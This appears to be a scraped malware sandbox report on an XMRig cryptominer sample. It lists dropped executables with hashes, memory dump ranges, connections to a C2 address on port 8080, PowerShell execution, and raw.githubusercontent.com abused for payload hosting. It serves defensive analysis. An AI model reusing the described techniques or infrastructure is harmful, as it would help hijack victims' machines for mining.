C:\Windows\System\TBSoswv.exe

C:\Windows\System\TBSoswv.exe

C:\Windows\System\xZOkzRU.exe

C:\Windows\System\xZOkzRU.exe

C:\Windows\System\IHnAtOv.exe

C:\Windows\System\IHnAtOv.exe

C:\Windows\System\pUOpCWp.exe

C:\Windows\System\pUOpCWp.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2220-0-0x000000013F8D0000-0x000000013FCC6000-memory.dmp

memory/2220-1-0x0000000000080000-0x0000000000090000-memory.dmp

\Windows\system\XtrSYcZ.exe

MD5 55f24d71f51956b9c0aa4fa9067e4e1e
SHA1 a420bfedff609026ce7440b88986b7fd01093cf2
SHA256 aa0eecf2ba7a81b79fa26e13d4819f4a88a2f1739a22d43494fc8565b9d6e8bc
SHA512 4c2d1f36ebca4cf0fac0dd2ac1c1c33d734f70317a82159c62d48b361e63263a89c41a50407dc7af1cb96584269723465bb04571be73bf90833ff22f80e75c68

memory/2220-11-0x00000000031B0000-0x00000000035A6000-memory.dmp

\Windows\system\xTAGGOe.exe

MD5 b70dcfee8f23fb6c141d8985e0ee7b57
SHA1 83102ae43104839615623f337e0cc0b10698d4fa
SHA256 a2656c5284c879c9674ffa9fc942057500983cd9d418cebd381882a2406b36a9
SHA512 b8d76ccf6bf860d1a85e4b73b1bfa7da8074b9c868fa4cc29cbea960dd7e78787aeb680c7d1cb001b400ddbb948f1db92ae2118f1f298b06001fcf87fa7315b1

C:\Windows\system\DBfwJRA.exe

MD5 32f5a324ddff4f2b3cff60dfd2a4683b
SHA1 ba3e6b670c1ad66290694da8b98be4f2b24c4758
SHA256 5fdb7504b23177c5f3ab8e504d2f82fbc641d7af784084f3304f50676c9871fb
SHA512 d3a93e5fd94b36c895cc3a33f982247b8155390518aa33e50b462539c96e645ee543182ea92ca15ddcea45c31eecfaf40050517856526343b529dfb170f17e4f

C:\Windows\system\QPlUZvW.exe

MD5 fda4d8cccc3908ef9d6caf81205f2360
SHA1 cc81929dfed2e1f74019c40ed4ee55fb667b4e7f
SHA256 0265a36995ca1b2f31e58a9450885ac6ca51bbd835148821edcae36780876cfe
SHA512 bf93b6ac74283af25476233d3978bf9fecef7cb83db916248bdb4fd5f53cba109c7996afbc77b9438092f3bef8e95a5fc3784bd0056cc5544599e8f9f2cd7b9f

\Windows\system\xZKVtVe.exe

MD5 78af8b1315714643164a6df5ca49c132
SHA1 1c47d34dd2b3c47747cf80b37d2f7137817a7db4
SHA256 faebfc4e761bcfcd44d62bb0d1740360e17fa4910b9265444024086d59f5c84d
SHA512 697bfd45087104ed6a9191ab6523a3a7bb32897525612fb0e34eccef89e7c5581a230deddf271c59ed567edc0ee1d93aa467d110d2bac35bc9f1849cd268a7bc

C:\Windows\system\MoQhhBb.exe

MD5 9e8086aa3dfa268bac56320b1808baba
SHA1 b327e74697d8f5fa3ae4d333486d3ca9b8cf6eec
SHA256 9707d78e3c952623264b6c612e52f6e3353625e21fa5a1feaa3740435007f279
SHA512 c94cb0e6c4eaf0ab9c4d07824a2d121c486b66e3fe9021224f641d5396c63b5373376a55d2c7696af831f8fc2ec1071a7c00daa89d02f7838b4d1b9a9e68c99f

C:\Windows\system\CnWrEkP.exe

MD5 f79c53914518a801604e57204782c77d
SHA1 fc85582781713c03a053513d94404ad6b4e56934
SHA256 bef2da8c5e6ef107ed31c46f54edc084d8c58017d1d2bb648459871af7904f40
SHA512 c07775daffe0f90560dff6c671c42455e1e867ae2ee3b1dca0b77dc9a5b096a81e5e5807a8e660b68604aedb6674c8c4756c7d348623561ea7a932b148db75b9

\Windows\system\ccQojgd.exe

MD5 e4b0947dc0390e87dfc1ad195173463a
SHA1 d9807b96502d3b7a9e959f5476949e167d193738
SHA256 919d4772f2f03cbbb0857f57355e6e607b262f34b7927e6e7458fcf987ff1e77
SHA512 6760896dd9ed4a20f89972054bee6ce17f7bdaf3d0f22079ee8aa8b902480b509698c970aefbd80c107ad1088ab7bccc1987a8acda3821dc85a93701122dd4f4

C:\Windows\system\UDWXOJH.exe

MD5 917c7488f633010aa2221e166c858c4e
SHA1 12885f3d4255536a88440790db45b5414cfa3b31
SHA256 3605d8450c6225f4d5d9ca8109d6d2a499efef5fcaa6e989506a8cc102e67f42
SHA512 3a001ce6c838d6709c4233743d9d246ffc46f8270bd08802024a91f49985a979f4fb896ab2ef306b47775d141715b0989db63ee5d4c3e868921a9b4dbd852ae5

C:\Windows\system\Bbxmlzd.exe

MD5 6ebdb29294450982ccae9f74ec966c25
SHA1 b0734dfaae18511517b97a30ae774acf60dcc417
SHA256 8e9549a7cf009233208d95c99dd8a125bde8395ea51f8bb9997c0b2383177d5c
SHA512 4c0b75783dbaa447a94776d92e992fff559b150b4fde34f5cfb05ca183e4ac8b83a5ea75792c0d651ecfbe7992b880fefa3190ff0262d4b1dd997aee1765c1c4

memory/1044-118-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

C:\Windows\system\mIvnzGJ.exe

MD5 fb6f7766ba1c9002923d5195753549b0
SHA1 e25733a3343561bda7e8d0854db40e909d74f006
SHA256 f68e123b11eb50c57a684e677decb60b746fc2e604f63a22cad733aa0ccaaa6f
SHA512 871a9dbb1144b14f11b2606c5e8d89ed11775f4d0864059dbc95115d3990be9adeefb92c18a98608feeee68bdd266ac5b37fd5d73f9da628c3658f74b1a0833e

C:\Windows\system\CDwjHlf.exe

MD5 3ffdb79b27251f59dd5a91ee66e1049e
SHA1 aacfc955fb259fd964bffb7d54cae5baab2891fd
SHA256 cb1f58892686a35dd84d1f7520805b9bbd23d2ae8f462244d98a389e42677834
SHA512 54e87830067247dbef134f1f46d47dc3ca1a2788393d2edd4860125d28d13bea44b28017e81312f63c5800248bb87f6627037dc5b4ae935a7e02df10b9c8b97c

C:\Windows\system\isMtcYA.exe

MD5 0b04a8893d6df7300c7e1b307f95af66
SHA1 809e4adaa1c5c5bdb31a22d2c69d1577d9c1af1e
SHA256 6bc381b68499060dea0fef5ae2ed50b0b3e435a922451d5a2f296b27de70d761
SHA512 8fae11e64a938d250969160d94835009fa9ff8162ba43cce5993947da37f3e5b3c3a2f28809121c49bfc181fa6c41c76ee128a93aa5cbc4feb843c1b50eb7ca7

C:\Windows\system\tTOWeyA.exe

MD5 4b5fef0acd620f38aff8c1551e9b370c
SHA1 2834459558476a9b36a5dd0e97642f77090c1ff0
SHA256 f49640a4c751aac8622aa7b456dc90a30fbec44bc925a7afb1876b087f291a69
SHA512 54230421985e3a23892a24e7145956b543aaec8df42ccd04ba9bb2eb1509ae1eee2e7491d65654b5667d30fbd9ab8bea813cb4d1b7f4920e31787dec6fefd8c8

C:\Windows\system\sgUhosD.exe

MD5 244bff011265929a5bcb36f272ec2cc1
SHA1 38f20ccce7bfd2c653519d0a2d529930bab04205
SHA256 67cc679ad396a320bad316a1f8ecca9c0d237e8956bd0b7384e9650175ab617c
SHA512 87eb023032fd035477c52e355222baaae4e173f814f9c42d877db465d9dc9c7f877a0968062400f0b49d39d6ac0cf4cc911acaf5cf58dbc37144dd20f7d39b7a

\Windows\system\QuuhWIC.exe

MD5 012316fb9f34489447dbb241a3342c03
SHA1 140be006a06582aa540a4679ff6fa13ed6f96900
SHA256 c19004bb90408784fb07ff211809a9449ff4c80449faa28cb733ee2f5ec9e199
SHA512 55dfa00f39169077a5a7cb7a84d5cac8b538671adee2c11c0b82cf14cd20c2244c4855798e57d3104d4c80f37bd7eb5051f05bdcb9131e7406a32ea8ef9c533e

C:\Windows\system\yPWGjbN.exe

MD5 1d1a748de2b322a4940fef133b50a9ee
SHA1 c8762d52e445245a78750151101fb17661640571
SHA256 86c306a67482f0362e2377ef13be1033123e2d255b0bdc47b9362c28ecd80a29
SHA512 d8ffcd3078809ac8fda3352fb01ae0401ac1877ed8c373356a685b9cce32b604be0f70c8accabb175495c1b4285f86d14d66c9544cfb518add0d3e4803cdc6e8

C:\Windows\system\eBOKlaU.exe

MD5 0f82e861c46b0287373ae622c4219bde
SHA1 ea706216c50869ca5e65576e8cbe3aa3fa04a6e7
SHA256 3f02a58e29488b094f6387d2e104a5c72077c9e6e4f1c7b671085d2553d3e839
SHA512 a3ed9a2ba1605fdf7e6eb5fca579b844c48df3abcc63053a04f29a13e9fd54ca0964b706fd5aeab6da769f8b8e8f61fdd6fd0ebf10c4d3d30587222e627b8da9

\Windows\system\JioFZSG.exe

MD5 72f9689691d019561ee4780d947c6fa6
SHA1 5a4963ac7be9a57b4c359c2f9244c3baf83067e7
SHA256 5483930eab2a4801db02b8cb7678da506a2e41783d6481cd1b1208553fe35194
SHA512 45867954e76fd9353d0ddf957eda62dda5e8369a7a0e7d03cbe8648038e22c4739c55424d88dd482742b6874c4f21bef3b1139ca3feb7d216e2f5e0a1e887c13

\Windows\system\cVrwSps.exe

MD5 859d9b87b70dc044865f890ad8bda13f
SHA1 55fc714ed06b4df7aaeab3881ead04488493edee
SHA256 fea722aa6409288d832c0aa26ad022bbcd0ae136fd51be8aec0a9cd109ea470c
SHA512 4134ff9f6cb379f60e21d067de930d560e7c3fbe2ac7206eca6ab639328c565237d618f2cab2a08fba56e4f84eabcbb286f414de0f4f7480224dbe2f430df6cc

C:\Windows\system\rbwDEvV.exe

MD5 2304d60723ac641563b739904e0c5b37
SHA1 e18a4f114a67aff847208fb3a23d08c8d99076a5
SHA256 1012ce3408f49e8443af301f734fb6426a65adafacc241fed3d7ba08a797ec4c
SHA512 2c8909e9df877331e8add8fc8bbfbbac7ce23d174f05e2a150b7e47bbfede4f9408784a8922747602ce3967d2592a33bea9ead38183a22700ab845d1b19c88b5

C:\Windows\system\JwDKUOE.exe

MD5 173bd779f9276f5c0e0d91255d7b87ec
SHA1 bba482d128c04433eaddbd1e62abb1a814d0b7db
SHA256 5ec7cb905d04389e78c9e27d7688ca871c0490422d963de345ad8c08d13fb5c1
SHA512 b827daecb7469ffd7b61b1ae8f45df4e496aa0c180e66760b7261775244e1e3d074f7d3ddfafadd6c5c455c92411c5bd539783b074fc00af637844a005b739fc

C:\Windows\system\xMommvl.exe

MD5 715d0ccdcdc78df75d85f616dc8c60b0
SHA1 7f1cf19f9907d32841c0b61bc91f7ea130ab9402
SHA256 522fe7e946ab506c0f77acd373f830d44a23bc41682b28c30e3f49827584c0c1
SHA512 54f464fb1f48d3da957434e891ffbf8da4e901fc4e7bac5d5bc7d7ff876da8948ea566673777ab717347f3fe108ee4a00370533fed1580d8e97f2be5f04edd37

C:\Windows\system\dXpRoLz.exe

MD5 06547369bbaedb854632c2a4e02b827b
SHA1 584d899cba8b1527b29a5d777a99f180ae3e4637
SHA256 d6b2e1c446effcc8df6a3b1e482abbc253ff4f601e8b2894da6903ac9bcfe1a2
SHA512 7e5f34b38bc1a6a2ec48f66f2e4328711e949906189c90f78b64dd9d27525d177dfbe6b752d30815fff6eb55ebf50d98f885322f1167daaf69adb7866b314a5e

C:\Windows\system\SovYnRY.exe

MD5 72f85ee5641c57fc26665d231be231ca
SHA1 25fad4ee1aee0b12ab7bd1a43883fe4286d81303
SHA256 8146ab8d4f3eef2c1f177230259c3ba636d7a96c17986c926b4282997bd7111f
SHA512 b0b29ac0a93cc7c37914d1dfa1d735d8d26386594978c4541fe2a45e884461b0d1b614de5b1390da9e6a8af7379182e2e5996c8c25e66e3d018ee25120298a93

C:\Windows\system\PQAFiiC.exe

MD5 2dde055c71936be2ce1def6ea014945b
SHA1 0487ce1bc157ccb2bbaca0089a21058344d99bd0
SHA256 5cf003b40516ae4616f774b1161e1ab4c1c1f8c50387dca19d6481b033ad144a
SHA512 2a19cb195f02f92a91569e004843bed9ad8b6356465cef20d57111d70a9788869a8568311ccda0923f805c9cad3fa7660d183a30e5c06bc71fe8ff0ac7f5f021

C:\Windows\system\nTKodnR.exe

MD5 52d9bc5f48a418dc02bd3ac368434824
SHA1 16ca6acd64252d25a1012b1c0127149948160aa1
SHA256 d5c852f96a394b6810f54e6bafeee96e3848ce2554c773180ec0b88de2b2ca63
SHA512 3f9f56733b9f0c63d52a8a3475b1513d11157ed402ec287eddc4a2e06e98a8e5368b1b0ea5b4cf0627aa84fb2815316cd979b3b39b7586db4c1917151079941a

C:\Windows\system\BJSUIuI.exe

MD5 b41b4ac5b9802135fba4fdc5d2c04306
SHA1 13409d30e9cbbc8a9d25eac31b1f87368463071f
SHA256 ffab4bdc0b4f59b0c0df03a2969b33c2a070506feeee0fcba5ddeca19bf1ecc1
SHA512 562e574a838268f0d821509926b28975495fedc8970468942fb2826d3cbbeb0742018be23f68869796c55a30aeee744ff2c12d00920309cbb72acae0fe3997df

memory/2220-144-0x000000013F0C0000-0x000000013F4B6000-memory.dmp

memory/2220-141-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/1044-140-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2152-139-0x000000013F790000-0x000000013FB86000-memory.dmp

memory/2220-138-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/1808-137-0x000000013FBA0000-0x000000013FF96000-memory.dmp

memory/2220-136-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/2580-135-0x000000013F8A0000-0x000000013FC96000-memory.dmp

memory/2220-134-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/2524-133-0x000000013FAF0000-0x000000013FEE6000-memory.dmp

memory/2220-132-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/2564-131-0x000000013F650000-0x000000013FA46000-memory.dmp

memory/2220-130-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/2804-129-0x000000013F8B0000-0x000000013FCA6000-memory.dmp

memory/2220-128-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/2076-127-0x000000013F1A0000-0x000000013F596000-memory.dmp

memory/2220-126-0x000000013F1A0000-0x000000013F596000-memory.dmp

memory/2812-125-0x000000013FBA0000-0x000000013FF96000-memory.dmp

memory/2220-124-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/2664-123-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2220-122-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2720-121-0x000000013F0C0000-0x000000013F4B6000-memory.dmp

memory/2640-120-0x000000013FB40000-0x000000013FF36000-memory.dmp

memory/1044-111-0x0000000002890000-0x0000000002898000-memory.dmp

memory/1044-110-0x000000001B6B0000-0x000000001B992000-memory.dmp

C:\Windows\system\TKtdLsH.exe

MD5 c90acc38e4ff7e88aecb4ccf3018d763
SHA1 bab3099254cf32617f6683e05344be87410800b3
SHA256 b99840f8bb0abeaedac667fc24b2956da1c7ba86e34b24fcc03a42d9133e07c9
SHA512 619ad24bc1319f27c451f4a588f3885375748f689b1233e92367d1bc20b24889a6f93771c54b0bb3876a8c3e009287bc8c7e856b870c70da1e97ce39a88cd290

C:\Windows\system\RkyacgM.exe

MD5 fb38996f8f04b939d9a39097984bd6d2
SHA1 cf5151b9af8feb68f3abf55dd0996b9fc3f3b0e5
SHA256 275c1c5bacd18b51f0090fe0382e8228a3682a9f95748cf82eb932228d69ebb6
SHA512 5c19774493d53b93ac84d3f738545d927fe18e577bfc90772aa601a69dcfa775500c2ea020691eb17bc8a6c35c74961278ea123698844fc8dfd579315d2a8a92

C:\Windows\system\QyTICoF.exe

MD5 65db7038cf985cb49af497203a0ba937
SHA1 3a2c5ed36e2c0586625bfa5ffc0180dc47f73cd4
SHA256 bd0b0028478350ef7bec4f42213dd1fa96a7850914f888fac3380f964fff68b6
SHA512 a52cf3f32004d94dec9ed8970eb0ba78de242c57fadf6c01753e15c4e341653a554ecf37af92c24d610aa00fe860c75d17620b5fc294d5f24cc56609c85e22b9

C:\Windows\system\zbDmBlO.exe

MD5 3c0e1eaa8885ef00a3453817449270cb
SHA1 14eeeff1ea2fb2e1298fee63eb0eca0391d9ed18
SHA256 294b4de14d5ac029c58b330e7adbc384b28d9e70699382e7e018e715c1585e67
SHA512 6330a3db424c8f4fc0b100ac9efbcbbb93174865c46b561fb4bea678b7897b8839a1f8a3f53de864447fff57199268172c0f9109020533e8e5738cbf028955bc

C:\Windows\system\CppSwOg.exe

MD5 7ce759aa6c120bed73a87159f22f5913
SHA1 8f9f43bbf456da898fa108723f2cb98c41d7dba4
SHA256 7d4cad7a1247ee42969dc33bf5f8e687578a08f861a253d7a70771949c5d3fbc
SHA512 e3ef744b909ba7eec6ffe33782939b3fd0203b08364c3c15333f1bbca91cb9ae7e03399431de6f394302f67465cd531f41473fbb4aa0cdfe2ea6f047b215a211

memory/1044-20-0x000007FEF5BDE000-0x000007FEF5BDF000-memory.dmp

memory/1044-19-0x00000000028A0000-0x0000000002920000-memory.dmp

memory/2688-18-0x000000013F570000-0x000000013F966000-memory.dmp

memory/1044-574-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

memory/2220-2886-0x000000013F8D0000-0x000000013FCC6000-memory.dmp

memory/2220-2887-0x00000000031B0000-0x00000000035A6000-memory.dmp

memory/2076-5044-0x000000013F1A0000-0x000000013F596000-memory.dmp

memory/2524-5045-0x000000013FAF0000-0x000000013FEE6000-memory.dmp

memory/2664-5043-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2564-5046-0x000000013F650000-0x000000013FA46000-memory.dmp

memory/2152-5048-0x000000013F790000-0x000000013FB86000-memory.dmp

memory/2580-5053-0x000000013F8A0000-0x000000013FC96000-memory.dmp

memory/1808-5054-0x000000013FBA0000-0x000000013FF96000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-23 20:55

Reported

2024-05-23 20:58

Platform

win10v2004-20240508-en

Max time kernel

91s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\vwURSqq.exe N/A
N/A N/A C:\Windows\System\WngOAur.exe N/A
N/A N/A C:\Windows\System\ENWWAPV.exe N/A
N/A N/A C:\Windows\System\dmWoMWK.exe N/A
N/A N/A C:\Windows\System\EioBpKL.exe N/A
N/A N/A C:\Windows\System\DdufjLC.exe N/A
N/A N/A C:\Windows\System\RYYPJaX.exe N/A
N/A N/A C:\Windows\System\yXivLBF.exe N/A
N/A N/A C:\Windows\System\GGAUtsA.exe N/A
N/A N/A C:\Windows\System\IjbDOws.exe N/A
N/A N/A C:\Windows\System\EfIgxtu.exe N/A
N/A N/A C:\Windows\System\msFAJgQ.exe N/A
N/A N/A C:\Windows\System\xVJwUwj.exe N/A
N/A N/A C:\Windows\System\uMgbhTy.exe N/A
N/A N/A C:\Windows\System\BqmWcmN.exe N/A
N/A N/A C:\Windows\System\WvuiSss.exe N/A
N/A N/A C:\Windows\System\IBlFuHI.exe N/A
N/A N/A C:\Windows\System\DKTcxMD.exe N/A
N/A N/A C:\Windows\System\XPkwDvL.exe N/A
N/A N/A C:\Windows\System\XPHDEiZ.exe N/A
N/A N/A C:\Windows\System\FdcYQlY.exe N/A
N/A N/A C:\Windows\System\aRQkqdc.exe N/A
N/A N/A C:\Windows\System\ThWupZa.exe N/A
N/A N/A C:\Windows\System\WODCwBP.exe N/A
N/A N/A C:\Windows\System\eBwWORu.exe N/A
N/A N/A C:\Windows\System\myCXvhw.exe N/A
N/A N/A C:\Windows\System\tbDPXFB.exe N/A
N/A N/A C:\Windows\System\SjFvgmM.exe N/A
N/A N/A C:\Windows\System\NBvmTxC.exe N/A
N/A N/A C:\Windows\System\PaZJONn.exe N/A
N/A N/A C:\Windows\System\jafrezm.exe N/A
N/A N/A C:\Windows\System\IxJVqLC.exe N/A
N/A N/A C:\Windows\System\MaOQvHi.exe N/A
N/A N/A C:\Windows\System\KgmEKqX.exe N/A
N/A N/A C:\Windows\System\rnATuCI.exe N/A
N/A N/A C:\Windows\System\IjBIlwG.exe N/A
N/A N/A C:\Windows\System\tQneiNt.exe N/A
N/A N/A C:\Windows\System\hUFadcN.exe N/A
N/A N/A C:\Windows\System\DHXNyoa.exe N/A
N/A N/A C:\Windows\System\CoiTgUW.exe N/A
N/A N/A C:\Windows\System\ZZurYzd.exe N/A
N/A N/A C:\Windows\System\xmVNIqm.exe N/A
N/A N/A C:\Windows\System\dpdofjk.exe N/A
N/A N/A C:\Windows\System\QMvZpuf.exe N/A
N/A N/A C:\Windows\System\XNtsQoq.exe N/A
N/A N/A C:\Windows\System\vmfUkUp.exe N/A
N/A N/A C:\Windows\System\kUDztcm.exe N/A
N/A N/A C:\Windows\System\WpShEXU.exe N/A
N/A N/A C:\Windows\System\lBdbnsf.exe N/A
N/A N/A C:\Windows\System\mrkVCvS.exe N/A
N/A N/A C:\Windows\System\buqVJNM.exe N/A
N/A N/A C:\Windows\System\XLVQSRB.exe N/A
N/A N/A C:\Windows\System\eVymYde.exe N/A
N/A N/A C:\Windows\System\iixFTTu.exe N/A
N/A N/A C:\Windows\System\KRbMiKs.exe N/A
N/A N/A C:\Windows\System\KzexIiU.exe N/A
N/A N/A C:\Windows\System\cyHdPxs.exe N/A
N/A N/A C:\Windows\System\GqqUqiB.exe N/A
N/A N/A C:\Windows\System\YyFaSWZ.exe N/A
N/A N/A C:\Windows\System\vVjctlF.exe N/A
N/A N/A C:\Windows\System\TJqVWkx.exe N/A
N/A N/A C:\Windows\System\EolTWdK.exe N/A
N/A N/A C:\Windows\System\afGujuW.exe N/A
N/A N/A C:\Windows\System\PhrFKXu.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\PPuukdP.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BOrNoeh.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rnKsfFt.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hKJfnDv.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uaYAfMR.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yFKTdRo.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qqowkEe.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Lnmhvtw.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wKSiRSN.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NozkMoj.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RJTCbhk.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rtbHFrF.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nkgJbwk.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ckAJeMW.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kaVrpAS.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tPZUYHD.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RYHbtxa.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Tjbazzg.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\clvalvx.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kErNpVI.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PkvGXKK.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\APxagUW.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nOKTKnF.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WASDtlK.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\neFcekQ.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RqKdsYt.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uvpkVfa.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
